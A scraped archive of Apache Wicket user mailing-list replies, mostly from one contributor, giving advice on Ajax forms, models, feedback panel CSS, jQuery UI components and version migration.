another system a lot more feasible. Good point, thanks. So, in your approach, how do you import, let's say game_item.pyfrom test_game_item.py? And does it then have to be run from a specific folder ( omission-git, omission-git/omission/, or omission-git/omission/tests) or does it work from all the above? Within omission/tests/test_game_item.py, I would import that other module via... I always run python -m omissionor pytest omissionfrom within omission-git. Thank you so much for this article. Hard to overstate how helpful this is for someone who feels relatively competent at the language but completely inexperienced at building something sane looking or structured appropriately. Nice article! While this is probably beyond the scope of this article, one useful addition for those that need to create packages frequently would be to look into using cookiecutter. It lets you create a "package template". While these templates can be simple, they can also include support for many dev tools such as docker, travis-ci, sphinx, doctests (via pytest/nose/etc), etc. Once the cookiecutter template is ready, you run a quick wizard and it generates the project directory/files for you. There are also a bunch of templates already available, some of which are specialized for specific tasks (such as data analysis). For more info: cookiecutter.readthedocs.io/en/lat... github.com/audreyr/cookiecutter Thanks for this article! It is very useful for beginners. I would like to suggest to mention wemake-python-styleguide in one of the future articles. In my practice, it is very helpful for beginners, since it enforce insane rule to struct and clean your code. That's what stimulates learning progress! Anyway, great series. Waiting for the next articles. Such a great article, thank you very much. I've just dived into Python, having used multiple languages before. But these are exactly the explanations needed by Python newcomers to get a better understanding how things work in Python. thanks a lot for your article, this was exactly what i was looking for since this topic is skipped by basically everyone else... You said that the topic with the import of app.py instead of using main.py is out of scope... Do you plan on writing up something that is picking this topic up? I'm quite interested in the reasoning of this approach, do you have any reference by chance? I don't think there are any formal guidelines on the topic, to be honest. My use of app.pyhas a lot to do with separation of concerns; I put my GUI startup code in app.py, and my non-GUI startup code in __main__.py. I can't really point to something that says this is "right" or "wrong"...it just works out pretty well for my project. It's something that has to be considered on a project-by-project basis, really. Finally, a straight-forward description that is really well explained. As a Java developer getting into python, I've always been frustrated when asking python devs where I am about solid source code structure for python projects that makes sense and won't lead to the apparent mess of what I've seen in lots of python code (they usually just say I'm being too much of an uptight "java" dev... and I should just create a .py file and start "hacking" away). Cheers, Jay. I certainly apologize on behalf of the Python community for your being treated like that! "Just start hacking" is, I believe, what someone says when they really don't know the answer, and are afraid you're going to find them out. In my experience, the #pythonFreenode IRC room isn't like that most of the time. We have frequent conversations about proper Python project structure; most of this article came out of those conversations. Of course, as with any community, it depends on which people you encounter, but I would recommend checking that room out in general. That's an excellent explanation. I can understand the project structure better with this. Thanks for your article, Jason. Looking forward to read the following ones :D Nice article, you dropped a _in this snippet: Just so you know! Thanks for catching that! I just went back and fixed it. :) I've just start learning to code. I love this series. Thank you for making this. Nice article, definitely gives me some things to think about as I approach my next project (my first 'real' project, so to speak) Hi Jason, when will you publish the next part of tutorial ? I don't have a specific schedule in mind, and I'm balancing a few things, but I hope to have the next published later this week, or early next. That said, I cannot promise any particular timeline beyond that. It all depends on how some other pieces of my life go. It might be really quick, or I might only post every other week. Can't say for sure. Given how popular this series is, though, it's a very high priority of mine to update and finish. Excellent guide! Thanks! Nice article, Jason. The code shown in this article is available somewhere? I'd like to check some of the inner details. Here you are, although I'll warn you that it's being heavily restructured at the moment. A game with a deceptively difficult premise: find the missing letter. Omission A game where you find what letter has been removed from a passage. Content Notes The content for this game has been derived from "Bartlett's Familiar Quotations". For brevity, the source of each quote has been omitted - both title and author. Sections previously italicized have been replaced with CAPS for easier display. Passages have been trimmed and rearranged to be no more than 4-5 lines. Authors Thanks to the following: Dependencies Installing To install from source, see BUILDING.md. Contributions We do NOT accept pull requests through GitHub If you would like to contribute code, please read our Contribution Guide. All contributions are licensed to us under the MousePaw Media Terms of Development. License Omission is licensed… This series has been awesome Jason, thanks! Nice article!!! i wonder where to place the venv directory in this project structure? venvalways belongs at the top-most level of the repository (make sure you untrack it via .gitignore!), or else outside of the repository altogether. Very nice article!
https://dev.to/codemouse92/dead-simple-python-project-structure-and-imports-38c6
CC-MAIN-2021-31
refinedweb
6,215
67.25
After I retrieve any Scalar value in the database, It's my job to write code such as this for nullable fields. cmd.ExecuteScalar() == DBNull.Value ? 0 : (int)cmd.ExecuteScalar() However I can't stand it since it executes the Executescalar statement two times. This is an extra visit to the server for this site and in support of performance I'd rather not do that. Can there be in whatever way I'm able to eliminate this extra ExecuteScalar()? Write yourself extra time way of the sql command. public static T ExecuteNullableScalar<T>(this SqlCommand cmd) where T : struct { var result = cmd.ExecuteScalar(); if (result == DBNull.Value) return default(T); return (T)result; } Usage becomes: int value = cmd.ExecuteNullableScalar<int>(); Only use a flexible to cache the end result: var o = cmd.ExecuteScalar(); return o == DBNull.Value ? 0 : (int)o; object o = cmd.ExecuteScalar(); return (o== DBNull.Value) ? 0 : (int)o;
http://codeblow.com/questions/how-do-i-look-for-dbnull-while-performing-my-command-only-one/
CC-MAIN-2019-51
refinedweb
152
60.51
Purging Zero-Version-Only Elements in ClearCase George F. Frazier georgefrazier@yahoo.com An annoyance with the Windows version of Rational ClearCase is that it is easy to accidentally create a branch of an element whose only version is 0. If you use ClearCase for version control, you'll know that version 0 of an element has exactly the same contents as its parent. This seems harmless. But consider this typical config spec: element * CHECKEDOUT element * .../mybranch/LATEST mkbranch mybranch element * .../myparentbranch/LATEST element * /main/LATEST end mkbranch Suppose element myfile.cpp has the following versions: myfile.cpp@@/main/1 myfile.cpp@@/main/myparentbranch/1 myfile.cpp@@/main/myparentbranch/mybranch/0 Here myfile.cpp@@/main/myparentbranch/mybranch/0 branches from myfile.cpp@@/main/myparentbranch/1. Now in a different view, suppose you or someone else creates myfile.cpp@@/main/myparentbranch/2. In this case, 99 percent of the time you want to select this new version, but your config spec still selects myfile.cpp@@/main/myparentbranch/mybranch/0, which is equivalent to myfile.cpp@@/main/myparentbranch/1! ClearCase site administrators can configure the installation to make this less likely to occur, but developers usually don't have "super-user" access to large ClearCase installations. I've found that this situation is particularly problematic on Windows. By default, if you uncheckout the first version of an element on a new subbranch, you are left with the zero version. This is not a problem: You can just delete the subbranch if you remember to. However, I've run into thornier situations when using the GUI version of the Windows ClearCase Merge Manager: - Invoke FindWizard and accept the defaults this includes "Automatically Merge Directories." - Let the merge manager find elements to merge and then before doing the merge, exit the merge manager (this is a reasonable activity; sometimes you just want to know what the merge candidates are). - Notice that many directories might be checked out after exiting. Now use the Find Checked Out Files tool to find and then uncheckout those directories. Now all new directories on the "from target" of the merge have zero-only versions of mybranch. Depending on what you're doing, this could be thousands of elements. You can compound this by actually running the entire merge and then bailing out without checking in the files. So what's the fix? If you can convince your configuration management team to provide tools that automatically delete these zero-version items, then you are in great shape. If you're on your own, though, you need to purge your view of those troublesome entities. Run the following command to find all zero-version elements: cleartool find -avobs -branch'{ brtype(mybranch)&&! (version(.../mybranch/1))}' -print > c:\files.txt This will find all elements with no version 1 on mybranch (if you read closely you'll notice it doesn't do the right thing if you have removed the 1 version of an element that already has versions greater than or equal to 2 this is a rare situation though). Once finished, it's simply a matter of using rmbranch to nuke the elements (make sure you know what you're doing here!). There are many ways to do that; since I run the MKS toolkit, I execute the following from a command window: cleartool rmbranch -f 'cat c:\files.txt' A printf for Message Boxes Matthew Wilson matthew@synesis.com.au The Windows MessageBox() function provides a standard form of dialog interaction with the user for the purpose of posing simple interrogatives, where the answer can be expressed in terms of the provided responses (OK, Cancel, Yes, No, Retry, Ignore, and Abort). MessageBox() is also useful as a crude but accessible debugging aid, as shown in Listing 1. This is a fair amount of additional typing, but it is not (yet) onerous. Often in such cases, however, there is a requirement to provide more detailed feedback by "sprintf-ing" information into the MessageBox text, as in Listing 2. The situation gets even worse when you want to load a string as the format string or the title. The (pretty obvious) answer to this is a function, MessageBox_printf(), which I wrote after getting very tired of such verbosity. Presented here is the 32-bit ANSI version, using the ANSI versions of the requisite API functions (see Listing 3). The function effectively "sprintfs" the variable arguments, if any, into a buffer according to the format string lpszFmt, and then displays a message box with the resultant buffer as the message box text using the given hwnd, lpszTitle, and uType parameters. If either or both of the lpszFmt and lpszTitle parameters are actually string resource ids (by dint of having 0 in their upper 16-bits), then they are loaded from the given instance handle hinst. If hinst is NULL, then it is derived either as the GWL_HINSTANCE attribute of the given window (if any), or otherwise as the instance handle of the calling process. The function returns the MessageBox() return value, not that of the wsprintf() call, so that the function can be used to interrogate the user in the same way as MessageBox() itself. The implementation is pretty straightforward. Local buffers are used in order to provide some memory substance to any text strings loaded from the resources. The only notable feature is the sizes of these buffers. wsprintf() will printf a maximum of 1024 destination characters (including NULL), so szText is of that dimension. The sizes of szFmt and szCaption are 768 and 128, respectively. These seem to be arbitrary but are, in fact, derived through trial and error such that this function does not precipitate the Visual C++ compiler to attempt to insert the _chkstk function (due to the stack potentially exceeding the boundary of the guard page), which then precludes the practice (common in my libraries and simple programs) of excluding the C Runtime Library. These limits have not yet caused any restriction of utility in the long time that I've been using these functions. Included in this month's archive is a sample main that exercises the functionality, and a Visual C++ 5.0 project. Customizing the Visual Studio IDE (VS6 and VS.NET) Glenn Pope gpope@ev1.net Most Windows applications (including VS6 and VS.NET) maintain a Most Recently Used (MRU) list that allows you to open files or projects without having to search around for the location of source files. This is nice until you need to copy the DLL or exe that you just compiled. Once done, you have to fire up Windows Explorer (or one of its brethren) and navigate to your project directory. If you are like me, your project directories can be nested several levels deep and possibly on differing drives. Can you say network storage? With mapped drives and multiple code repositories, locating the source can be frustrating. Don't count on the MRU list either because it will only show the name of the project without the path once the project is opened. I could write a script to do this, or add a postbuild step, but I like using Explorer because I often do a bunch of cleanup and copying that I can't easily automate when I'm iterating through a build/debug/install process. A solution that works for me is to customize Visual Studio with a simple button that launches Explorer with the target directory preselected. While not profound in and of itself, it is worth reviewing how to do this since, with a few customized menu options or tool buttons, you can standardize a build process across an entire team of programmers. For the simple case of launching Explorer, start by pulling down the Tools menu and selecting External Tools. Click the Add button, and enter: Title: Explorer Target, Command: explorer.exe, Arguments: /e,/Select,$(TargetDir) Click OK and you now have an external tool you can invoke from the Tools menu. While we are reviewing the ABCs of Visual Studio IDE customization, we can take it one step further and add the command to the toolbar by selecting Customize from the Tools menu. On the Commands Tab, in the listbox on the left select Tools. In the listbox on the right, scroll down until you find External Command xx, where xx is the index number of your new command (start counting at 1). Select the proper External Command xx with the left mouse button and drag it onto your toolbar in the IDE. The text will update once you close all customize dialogs. Of course, there is nothing magic about using this process to launch Explorer; you can customize the IDE as necessary based on your requirements. This can be a particularly effective way to train a new programmer about a particular build system. Just provide buttons for each step they need to perform after building, such as producing an install, firing up test or profiling tools, using source code control, running regression tests, etc. Order these buttons from left to right based on the natural order in which the steps should be taken, and you've turned Visual Studio into a visual README file of your configuration management process. A Shareable Approach to Debugging Additional DLLs Matthew Wilson matthew@synesis.com.au The June 2002 edition of WDM contained the tip "Setting Breakpoints in Additional DLLs with VC++" by Gigi Sayfan, which described how to use the support built into Visual C++ (available since 2.0). There are circumstances, however, where the use of the built-in support is inadequate or undesirable. This is because the Additional DLL's information is stored in Visual Studio in the corresponding .opt file for a particular workspace. If part of one's development practice is to regularly clean out the working directory tree (it is, right?), then this information will be lost. An alternative to this is to store it along with the project workspace in source control. But this is troublesome, not just because the .opt file appears to accrete (often erroneous) content throughout the lifetime of the active project, but also because such an approach would limit the developer(s) sharing this file to a single working directory for the Additional DLLs themselves (which precludes freedom for projects that generate output via relative path). This restriction is onerous for an individual, and positively untenable for most collaborative environments. The solution that has found application in such collaborative circumstances is to force the explicit libraries to be loaded implicitly by the operating system when the application being debugged is loaded. This means that any breakpoints set in a prior execution will remain set (unless the code itself has changed, of course) in a subsequent one. To do this, one must explicitly link in a function exported by each additional DLL. For example, a library BASESTD.dll could export the function: void __stdcall linkBASESTD(void) { } which can be referenced in the application code in the following way: #ifdef _DEBUG static /* Can put in unnamed namespace in C++ */ void func_never_called() { void (__stdcall *_linkBASESTD)(void) = linkBASESTD; } #endif /* _DEBUG */ This has no run-time cost, and only links in for debug builds. It has the effect of linking to BASESTD.dll, which is, therefore, implicitly loaded, and its breakpoints are preserved. This technique is very useful for solving the breakpoint issue in collaborative projects, but it should be pointed out that its use does change program behavior, due to the loading of all such linked libraries at application load. Subtle library-load ordering issues can be masked. I would therefore strongly recommend disabling the implicit loading prior to moving to a release-testing phase, specifically to detect any ordering issues. George Frazier is a software engineer in the System Design and Verification group at Cadence Design Systems Inc. and has been programming for Windows since 1991. He can be reached at georgefrazier@yahoo.com.
http://www.drdobbs.com/tech-tips/184416653
CC-MAIN-2017-43
refinedweb
1,987
52.49
Re: Wicket dropdownchoice onselectionchanged must override or implement a supertype method Right, should probably be something like: protected void onSelectionChanged(SelectOption newSelection) {}; Also, note that SelectOption is generic... Regards, Sebastien. On Tue, Apr 24, 2012 at 8:18 PM, Per Newgro per.new...@gmx.ch wrote: it is because of the @override annotation on a non Re: call onsubmit automatically a setResponsePage; you just have to get the right Page class from the param and maybe construct your PageParameters also... Hope this helps, Sebastien. Re: call onsubmit automatically you want to redirect to. Hope it answers your need. Sebastien. On Mon, Apr 30, 2012 at 12:34 PM, raju.ch raju.challagun...@gmail.comwrote: Thnx for the reply sebastian, but I didn't get the solution what you suggested..Can you please explain it with an example? thanks in advance -- View Re: AutoCompleteField returning null Hi, The feedbackpanel always shows that the value it is getting back from itemField is empty. itemField.getValue or getModelObject will returns empty if it is not in your form... (this is the only reason I see regarding to the code you supplied) Sebastien. On Tue, May 1, 2012 at 3:54 PM Re: AutoCompleteField returning null Oops, I did not saw you was using an AjaxLink... You have to use an AjaxButton instead. Sebastien. On Tue, May 1, 2012 at 5:51 PM, cmagnollay cmagnol...@gmail.com wrote: Well, that is not the case unfortunately. Here is my code as stripped down as I could get it, to still supply information Re: AutoCompleteField returning null () (but not getModelObject, which might return null in that case). Thus, the onSubmit (the one of the form) will not be called (once again, because the form has not been processed), only the button#onSubmit will. Hope this helps, Sebastien. On Tue, May 1, 2012 at 6:51 PM, cmagnollay cmagnol...@gmail.com wrote: Hmm Re: AutoCompleteField returning null failed. Sebastien. On Tue, May 1, 2012 at 8:21 PM, cmagnollay cmagnol...@gmail.com wrote: No, this looks very promising. Thank you very much for elaborating. I still do not understand what is different about AutoCompleteTextField that it will not give me back the textual value (getModelObject Re: Wicket 6.0.0-beta1: RangeValidator Issue (NPE) Hi Martin, Here we are: Sebastien. On Thu, May 10, 2012 at 9:38 AM, Martin Grigorov mgrigo...@apache.orgwrote: Guys, Please use Jira for bug reports. On Thu, May 10, 2012 at 9:28 AM, Thomas Götz t...@decoded.de wrote: I can confirm Re: Need help in implementing Ajax form onSubmit. But apart from that, I just would like to tell you that if you need an authentication mechanism, you'll probably better have to use the wicket-auth-roles. All you need to know is here: Regards, Sebastien On Mon, May 14, 2012 at 8:10 Re: Need help in implementing Ajax form And the WICKET AJAX DEBUG mark appears as soon as you are dealing with wicket ajax component. It is not displayed anymore when your configuration changes from development to deployment (web.xml) On Mon, May 14, 2012 at 9:47 PM, Sebastien seb...@gmail.com wrote: Hi kshitiz, Well, looking Re: Need help in implementing Ajax form ? If terget == null then nothing happens in onSubmit() method. - Add some logging (log4j etc.), to your app Regards Wlodek 2012/5/14 Sebastien seb...@gmail.com: And the WICKET AJAX DEBUG mark appears as soon as you are dealing with wicket ajax component. It is not displayed anymore when your Re: Nested Form submitted via ajax clearing fields in outer form Hi, why does it call onFormSubmitted for the root form? Is this the way it has to be programmed for nested forms to work? Well, I think it should not be the case, according to: Regards, Sebastien. On Thu, May 17, 2012 at 4:18 PM, Hill, Joel Re: Access to Page from LoadableDetachableModel Hi, I aggree with Sven. Another option is to pass the panel to the LDM's contructor so you can do a panel.getPage() to get the page. Just cast to the appropriate page type and do yourpage.getMyModel(). Best regards, Sebastien. On Wed, May 30, 2012 at 10:32 PM, Sven Meier s...@meiers.net wrote Re: Access to Page from LoadableDetachableModel Well, I don't think so, even it needs to be tested. My guess is that the panel is added to the page (then, serialized). To the LDM's contructor, you will pass 'this' (means, the panel). In the LDM, you will store the reference of that 'this' into a variable. In all case, we always have the Re: Access to Page from LoadableDetachableModel Hello again, I tested in a quickstart and it works. (I just noticed you did not called super.onInitialize()) The code I used: class MyPOJO { public Boolean isSelected() { return true; } } public class HomePage extends WebPage { private static final long serialVersionUID Re: Access to Page from LoadableDetachableModel no problem to have the LDM as a nested class; for the quick start, the LDM was in the MyPanel.java (not nested then, but there is no huge difference strictly java speaking). Regards, Sebastien. On Thu, May 31, 2012 at 1:41 AM, gmparker2000 greg.par...@brovada.comwrote: Thank you so much Re: Filtercolumn and bigdecimal formatter (rowModel); item.add(new MyBigIntegerLabel(componentId, model)); // MyBigIntegerLabel should format your model object as string (using String.format?) properly here } Regards, Sebastien. On Thu, May 31, 2012 at 2:50 PM, Josh Kamau joshnet2...@gmail.com wrote: Shouldnt the filtering Re: Filtercolumn and bigdecimal formatter at DateConverter for help) } return super.getConverter(type); } Regards, Sebastien. On Fri, Jun 1, 2012 at 10:41 AM, Sebastien seb...@gmail.com wrote: Hi, I would have done something like that: public class BigDecimalFilteredPropertyColumn extends Re: Refresh listItem only of listView Hi, Well, you do not tell a much about the issue... So, several possible answers are: - You cannot add the listview in the target as it is a repeater, you should add its (or one of its) parent. - If you change the list, is your list a model ? (userTypeDomainList) Regards, Sebastien. On Sat Re: Refresh listItem only of listView to add/remove object), you can set ListView#setReuseItems to true so the re-rendering will be more efficient. Also, * If you nest a ListView in a Form, ALLWAYS set this property to true, as otherwise validation will not work properly.* (setReuseItems javadoc) Hope this helps, Sebastien. On Sat, Jun Re: Panel not getting refreshed... Hi, It's to late to have searchResultPanel.setOutputMarkupId(true); in onSubmit() You need to set this before the first rendering, because ajax need it in order to know how to re-redner the panel. Regards, Sebastien. On Sat, Jun 9, 2012 at 9:56 PM, kshitiz k.agarw...@gmail.com wrote: Hi, I Re: Panel not getting refreshed... re-redner re-render On Sat, Jun 9, 2012 at 10:01 PM, Sebastien seb...@gmail.com wrote: Hi, It's to late to have searchResultPanel.setOutputMarkupId(true); in onSubmit() You need to set this before the first rendering, because ajax need it in order to know how to re-redner the panel Re: Panel not getting refreshed... ()); error = true; } *target.add(searchFeedbackPanel); } Regards, Sebastien. On Sun, Jun 10, 2012 at 8:48 AM, kshitiz k.agarw...@gmail.com wrote: Did u mean this: final SearchResultPanel searchResultPanel = new SearchResultPanel(searchResultPanel Re: Panel not getting refreshed... but result panel is not getting refreshed. It is not even entering in that panel as I have some sysouts in that panel to check... Try to put one sysout in searchResultPanel#onBeforeRender, to check whether the panel is going to be refreshed. Additionally, look at the ajax debug window to see if Re: Panel not getting refreshed... (searchDomain); Also not needed, you already sets the model object at the form's creation. That's about all I see. Hope this helps. Sebastien. On Mon, Jun 11, 2012 at 8:29 PM, kshitiz k.agarw...@gmail.com wrote: Please help me I am really not able to understand why it is happening Re: AjaxCallThrottlingDecorator - 1.6 , Duration.ONE_SECOND)); } Best regards, Sebastien. On Tue, Jul 10, 2012 at 1:17 AM, Douglas Ferguson the...@gmail.com wrote: How do you throttle ajax calls in 1.6? Douglas - To unsubscribe, e-mail: users-unsubscr Re: migrating from 1.4 to 1.5 - some images problems Hi Sam, I think you can use this: UrlUtils.rewriteToContextRelative(ui/images/datepicker.png, RequestCycle.get()); It also works in Wicket 6. Regards, Sebastien. On Tue, Jul 10, 2012 at 7:22 PM, Sam Zilverberg samzilverb...@gmail.comwrote: Hi, First let me say that I already searched Re: I think it's time for a new book.... Igor and Co ? +1 too About the found raising, maybe could it be a book project in My Major Company or Kickstarter for instance... Regards, Sebastien. On Fri, Jul 27, 2012 at 9:27 AM, Josh Kamau joshnet2...@gmail.com wrote: What if the developers donate (or do a fund raising... ) to fund the writing Re: enabling and disabling the components afterward, using ajax, you will weed to set setOutputMarkupId(true), or even setOutputMarkupPlaceholderTag(true) if the components starts un-rendered Hope this helps, Sebastien. On Thu, Aug 9, 2012 at 10:53 PM, wicket user samd...@live.com wrote: I was reading about setEnable(false Re: enabling and disabling the components =fName /div /div div wicket:id=test1 div wicket:id=message /div /div Hope this helps, Sebastien. On Fri, Aug 10, 2012 at 12:49 AM, wicket user samd...@live.com wrote: Hi, I tried this . public class MyContainer extends WebMarkupContainer{ public MyContainer(String id, MyVO Re: Jqwicket -jquery-ui-plugins, feel free to make a pull request ! :) Thanks best regards, Sebastien. On Mon, Sep 3, 2012 at 10:28 AM, Decebal Suiu decebal.s...@asf.ro wrote: Hi In my opinion the main advantage of the jqwicket over wiquery/wicket-jquery-ui is the impressive list of jquery plugins (ui Re: JavaScript execution on Ajax response in Wicket ... Best regards, Sebastien. On Sun, Sep 16, 2012 at 10:25 AM, seba.wag...@gmail.com seba.wag...@gmail.com wrote: Hi, we build a single page application and want to extend that with some jQuery plugins. The issue is that $(document).ready( function() is not called (or only the first time Re: Unable to succesfully propagate event from panel since getPage() throws error Hi, Why not use BUBBLE instead of BREADTH so the order of traversal are component page ? ie: this.send(/* your panel */ this, Broadcast.BUBBLE, .) Sebastien. On Wed, Sep 19, 2012 at 5:28 PM, lucast lucastol...@hotmail.com wrote: Dear Forum, I have the following tree structure: WebPage Re: Where is IClusterable interface located in Wicket 6? Hi, Did you also upgrade wicket-jquery-ui to 6.0.0 ? Regards, Sebastien. On Thu, Sep 20, 2012 at 4:18 PM, nemanjko nemanja.kos...@gmail.com wrote: Thanks for the reply Martin. I don't get compilation error but runtime error when I try to start my project with Wicket 6. Here is the stack Re: String Value Conversion Exception Hi, You may also use #toLong(defaultValue) which does not throws exception and return a default value in case of conversion error (or value not supplied). Regards, Sebastien. On Thu, Sep 20, 2012 at 9:22 PM, Francois Meillet francois.meil...@gmail.com wrote: I don't see where you set Re: [Announce] wicket-jquery-ui 6.0.0 released Hi James, you're welcome! Glad to read that you like it. If you have any questions, do not hesitate to use the forum (will may find the address on the homepage). Thanks best regards, Sebastien. On Fri, Sep 21, 2012 at 9:19 AM, James Eliyezar ja...@mcruncher.com wrote: Hi Sebastien, Checked Re: Datepicker with range selection support Hi Sebastien, I am wondering how you imagine your range datepicker... Do you figure a component embedding 2 datepickers like in the jQuery UI demo site, where the user selects alternativey the start date and the end date: Or a component displaying Re: Datepicker with range selection support Hi again, Well... I was looking for a jQuery plugin for the 3rd part of my HowTo's, about creating a plugin using wicket-jquery-ui. Maybe will I play with that one in the coming days... (just note that it will be over Wicket 6) Regards, Sebastien. On Fri, Sep 21, 2012 at 3:53 PM, Sébastien Re: String Value Conversion Exception ), prefer: new Label(when, new PropertyModelString(blogPost, text)) Hope this helps, Sebastien. On Sat, Sep 22, 2012 at 4:25 PM, Stephen Walsh step...@connectwithawalsh.com wrote: On a related note to this original question. Can someone explain the difference between the two lines below Re: Datepicker with range selection support Hi Sebastien. wicket-jquery-ui has the goal to integrate jQuery UI widgets as Wicket components; but it's also designed to integrate (easily, I guess) any jQuery plugins (that's what I tend to evince in the tutorial series...). So, I played around with the fox-run-software (range-)date-picker Re: Avoid panel's extra div Hi Oscar, If I understand, the problem is that the div of the parent page is rendered, right? If so, you can decide to not render the parent component's tag by using myPanel.getRenderBodyOnly(true); Hope this helps, Sebastien. On Sun, Sep 23, 2012 at 4:17 PM, Oscar Besga Arcauz obe Re: Avoid panel's extra div oops: setRenderBodyOnly(true); On Sun, Sep 23, 2012 at 4:53 PM, Sebastien seb...@gmail.com wrote: Hi Oscar, If I understand, the problem is that the div of the parent page is rendered, right? If so, you can decide to not render the parent component's tag by using myPanel.getRenderBodyOnly Re: Datepicker with range selection support James, thanks for your comment. Yes, the demo site is a functional wicket app. You can get the source at the github project. Sebastien, you are welcome! Thanks to let me know what you finally did... Best regards, Sebastien. On Mon, Sep 24, 2012 at 3:06 AM, James Eliyezar ja...@mcruncher.com Re: [Announce] wicket-dashboard (small typo in your previous mail :) Nice job indeed, I will probably use it! :) Best regards, Sebastien. On Tue, Sep 25, 2012 at 2:16 PM, Decebal Suiu decebal.s...@asf.ro wrote: Hi I implemented a simple dashboard for wicket that can be found Re: Datepicker with range selection support enough, Sebastien. On Wed, Sep 26, 2012 at 8:50 AM, Martin Grigorov mgrigo...@apache.orgwrote: It seems you use Wicket 1.5.x with wicket-jquery-ui 6.x which depends on Wicket 6.0.0 On Wed, Sep 26, 2012 at 3:48 AM, Sebastien Gautrin sebastien.gaut...@gmail.com wrote: Hi, Me again. I Re: Datepicker with range selection support Hi Sebastien, Well, I am a little bit confused because it is technically almost impossible to deploy a wrong version. I checked the 1.2.3-SNAPSHOT source on the Nexus repository and it seems to be correct. What I know is that I deployed the 1.2.3-SNAPSHOT just after the 6.0.1-SNAPSHOT. I Re: Datepicker with range selection support Excellent! I deployed it just 5 min ago! :) So, it is good to know we should make a mvn clean before the deploy in case of git branch switching... Enjoy then! Best regards, Sebastien. On Wed, Sep 26, 2012 at 9:23 PM, Sebastien Gautrin sebastien.gaut...@gmail.com wrote: Just tested Re: Centralizing ajax inline javascript Yes, I think the AbstractDefaultAjaxBehavior could look to something like: public void renderHead(Component component, IHeaderResponse response) { super.renderHead(component, response); response.renderJavaScript(function boup(id) { + this.getCallbackScript() + }, my-script-id); Re: Subclassing FormComponentPanel / propagating setRequired() to child components ? Hi, Don't think you have to propagate #setRequired() to child components because the whole formcomponent is required. But I think you could overrive #checkRequired() - which is not final - to fit best your use case (which is called underneath by #validate()) Hope this helps, Sebastien. On Mon Re: Wicket and jQuery UI to provide Wicket jQuery UI components having (I hope) the same philosophy/logic as Wicket's built-in ones, so the user deals with these components the same manner he usually deals with the Wicket ones. This is the most important point IMO. In addition, it provides - as Sebastien said - pure Behavior Re: [DISCUSS] Security Frameworks to IRoleCheckingStrategy, then we bound a custom IAuthorizationStrategy to the application, in charge to check whether the item being displayed (in an edit page for instance) has a group that also belongs to the user. Sebastien. On Thu, Oct 18, 2012 at 4:09 PM, Nick Pratt nbpr...@gmail.com wrote: [X] I use my own Re: PaletteButton#onComponentTag(ComponentTag) does not call super Hi Sven, Done: Thanks, Sebastien. On Sat, Oct 20, 2012 at 9:53 AM, Sven Meier s...@meiers.net wrote: That was probably overlooked, please create an issue in Jira. Thanks Sven On 10/20/2012 12:36 AM, Sebastien wrote: Dear all, Just Re: Upgrade Advice +1, perfectly explained IMHO. Migrating from 1.4 to 6 directly is much more complicated than performing the migration in 2 steps and much more error prone. On Sat, Oct 20, 2012 at 2:55 PM, Chris Colman chr...@stepaheadsoftware.comwrote: I would say no only because going from 1.5 - 6 was super Re: Custom CSS for Feedback message is broken in 1.5 )); } } } Best regards, Sebastien. On Sat, Oct 20, 2012 at 11:05 PM, Sven Meier s...@meiers.net wrote: I was just going to ask you why you don't overwrite #getCSSClass(). What harm does it if the CSS class is on the li too? Sven On 10/20/2012 11:01 PM, Alec Swan wrote: Note Re: Custom CSS for Feedback message is broken in 1.5 or submit the pull request on github. If you do not agree, please tell me what I can do. Thanks best regards, Sebastien. Re: Custom CSS for Feedback message is broken in 1.5 Done, Please let me know if your encounter any issue (wrong base code for instance) or if you have any questions... Thanks, Sebastien. On Mon, Oct 22, 2012 at 8:06 PM, Sven Meier s...@meiers.net wrote: Please open a Jira issue and provide Re: Custom CSS for Feedback message is broken in 1.5 ... But at the end, will the user better understand getListCSS or getListItemCSS? Also, is getLabelCSS the best? What about getMessageCSS? That's all open questions... I wish you a good night with that! ;) Sebastien * ** I am pretty sure this term has previously been Re: Custom CSS for Feedback message is broken in 1.5 projects. I understand perfectly. Thus, there is a workarround I provided ealier in this thread; but - IMHO, again - I think it could be considered as an issue as it prevent a (logical?) customization... Sebastien. On Wed, Oct 24, 2012 at 4:48 PM, Paul Bors p...@bors.ws wrote: Yes, but how would Re: I would url clear, without jsessionid and ?1 variables so pages are not considered as distinct (MyPage?1 and MyPage?2 should sums stats for only one page: MyPage, which is not the case yet) Thanks in advance! Sebastien. On Thu, Oct 25, 2012 at 4:17 PM, Martin Grigorov mgrigo...@apache.orgwrote: On Thu, Oct 25, 2012 at 4:57 PM, Paolo Re: I would url clear, without jsessionid and ?1 : I will give this a try and will let you know! Thanks again best regards, Sebastien. On Thu, Oct 25, 2012 at 5:17 PM, Martin Grigorov mgrigo...@apache.orgwrote: Hi Sebastien, Is Re: EXTERNAL: Migration of generateCallbackScript to Wicket 6 [] { CallbackParameter.converted(...), CallbackParameter.explicit(...), CallbackParameter.context(...), CallbackParameter.resolved(...) }; } See javadoc for difference between converted, explicit, etc Best regards, Sebastien On Fri, Oct 26, 2012 at 7:52 PM, Phillips, David david.phill Re: EXTERNAL: Migration of generateCallbackScript to Wicket 6 (context, explicit, resolved context) and their corresponding javadoc in org.apache.wicket.ajax.attributes.CallbackParameter Sorry for the confusion, Sebastien. On Fri, Oct 26, 2012 at 8:18 PM, Phillips, David david.phill...@usaa.comwrote: I don't see that API in AbstractAjaxBehavior Remove ?1 from URL on GoogleAnalytics tracked pages to Martin (I would say: again!) to have suggested the right pointers. Sebastien. On Fri, Oct 26, 2012 at 1:17 AM, Sebastien seb...@gmail.com wrote: Hi Martin, Thanks for your answer! Yes, I think it - indirectly - answers the need! In short: Google Analytics does not take into account Re: Custom CSS for Feedback message is broken in 1.5 , Sebastien (*) (**) Sure, dev-team opinion is also kindly asked! :) Re: Custom CSS for Feedback message is broken in 1.5 (there is a new #newMessageItem() method), the span element is not needed anymore and therefore #newMessageDisplayComponent() neither. So, about the API break, we are in situation :) Thanks best regards, Sebastien. On Mon, Oct 29, 2012 at 6:18 PM, Joachim Schrod jsch...@acm.org wrote: Hi, This would Re: Remove ?1 from URL on GoogleAnalytics tracked pages : in the report, all visited pages was starting with /http://; (with the / at the beginning), instead of /context/my/path/to/page as expected. Thanks again best regards, Sebastien. On Mon, Oct 29, 2012 at 9:02 AM, Martin Grigorov mgrigo...@apache.orgwrote: Hi Sebastien, Thanks for sharing Re: Custom CSS for Feedback message is broken in 1.5 to *override* FeedbackPanel to achieve this goal... Thanks in advance best regards, Sebastien (*) hazardous translation from French... On Wed, Oct 31, 2012 at 11:37 PM, Alec Swan alecs...@gmail.com wrote: So, the patch can be applied to 1.5.8 and will replace label.add(levelModifier Re: Custom CSS for Feedback message is 